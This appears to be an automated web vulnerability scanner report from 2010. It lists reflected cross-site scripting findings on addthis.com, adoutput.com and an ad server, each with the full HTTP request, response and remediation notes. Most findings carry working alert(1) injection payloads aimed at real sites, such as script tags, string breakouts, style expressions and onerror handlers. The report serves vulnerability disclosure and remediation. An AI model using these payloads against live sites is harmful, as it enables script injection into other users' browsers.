GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&97117"><script>alert(1)</script>624b718fa81=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10095 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 20:21:37 GMT
1.132. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/8GF/iview/273499083/direct/01/4055590
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdfe"-alert(1)-"bc4ea792af0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&3fdfe"-alert(1)-"bc4ea792af0=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10048 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 20:21:37 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc601'%3ba4b4776bc56 was submitted in the REST URL parameter 4. This input was echoed as dc601';a4b4776bc56 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/directdc601'%3ba4b4776bc56/01/4347559 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6265 Content-Type: text/html Expires: 0 X-Powered-By: ASP.NET Date: Fri, 26 Nov 2010 20:33:21 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f425'%3b82df02f9b00 was submitted in the REST URL parameter 4. This input was echoed as 7f425';82df02f9b00 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/direct7f425'%3b82df02f9b00/01/4353325 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6265 Content-Type: text/html Expires: 0 X-Powered-By: ASP.NET Date: Fri, 26 Nov 2010 20:33:22 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7b7'%3b91d72ce6d9c was submitted in the REST URL parameter 4. This input was echoed as 4f7b7';91d72ce6d9c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/direct4f7b7'%3b91d72ce6d9c/01/4367731 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6282 Content-Type: text/html Expires: 0 X-Powered-By: ASP.NET Date: Fri, 26 Nov 2010 20:33:21 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22b68<script>alert(1)</script>c7dcdbaa3f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php22b68<script>alert(1)</script>c7dcdbaa3f1 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:50 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=nfcmfl3a8bvamf2epbm2sfr8v4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php22b68<script>alert(1)</script>c7dcdbaa3f1</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5c7a"-alert(1)-"857e19dcbea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpc5c7a"-alert(1)-"857e19dcbea HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:49 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=40ctjkt2h4hdgnllgcsm2qi256; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpc5c7a"-alert(1)-"857e19dcbea"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.138. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bca3"%20style%3dx%3aexpression(alert(1))%20509484a33de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7bca3\" style=x:expression(alert(1)) 509484a33de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=ny/7bca3"%20style%3dx%3aexpression(alert(1))%20509484a33depost HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:25:26 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="ny/7bca3\" style=x:expression(alert(1)) 509484a33depost" /> ...[SNIP]...
1.139. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c18"-alert(1)-"034c58d7f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/22c18"-alert(1)-"034c58d7f3a HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/22c18"-alert(1)-"034c58d7f3a"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a11"%20style%3dx%3aexpression(alert(1))%20f974865e7b3 was submitted in the username parameter. This input was echoed as a7a11\" style=x:expression(alert(1)) f974865e7b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=nyposta7a11"%20style%3dx%3aexpression(alert(1))%20f974865e7b3 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:57 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="nyposta7a11\" style=x:expression(alert(1)) f974865e7b3" /> ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764f1"style%3d"x%3aexpression(alert(1))"83f87f85126 was submitted in the v parameter. This input was echoed as 764f1"style="x:expression(alert(1))"83f87f85126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250764f1"style%3d"x%3aexpression(alert(1))"83f87f85126&username=nypost HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:49 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-250764f1"style="x:expression(alert(1))"83f87f85126" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da9a"-alert(1)-"c69f3c78fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3da9a"-alert(1)-"c69f3c78fc2/api-spec HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=9oaq5mil1k02nq110ts56omut3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1441 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/3da9a"-alert(1)-"c69f3c78fc2/api-spec"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77b50<script>alert(1)</script>696b9357f98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /77b50<script>alert(1)</script>696b9357f98/api-spec HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:47 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ml9o7tc804oogtbe2d38amhjd7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1467 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>77b50<script>alert(1)</script>696b9357f98/api-spec</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0a3"-alert(1)-"bb1385e53e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /help/6d0a3"-alert(1)-"bb1385e53e HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:24:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=89ulbati6ru761e244tt7suj63; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mouser=sk; expires=Fri, 03-Dec-2010 20:24:48 GMT; path=/ Vary: Accept-Encoding imagetoolbar: no Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 13400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>AddThis - He ...[SNIP]... <script type="text/javascript"> var u = "/404/help/6d0a3"-alert(1)-"bb1385e53e"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 8ec69<img%20src%3da%20onerror%3dalert(1)>5025a7d35c8 was submitted in the type parameter. This input was echoed as 8ec69<img src=a onerror=alert(1)>5025a7d35c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /version2/hit_rm.cfm?type=08ec69<img%20src%3da%20onerror%3dalert(1)>5025a7d35c8 HTTP/1.1 Host: www.adoutput.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 26 Nov 2010 20:21:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></ ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value "08ec69<img src=a onerror=alert(1)>5025a7d35c8" cannot be converted to a number </h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6b3b"-alert(1)-"dd17837dd5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
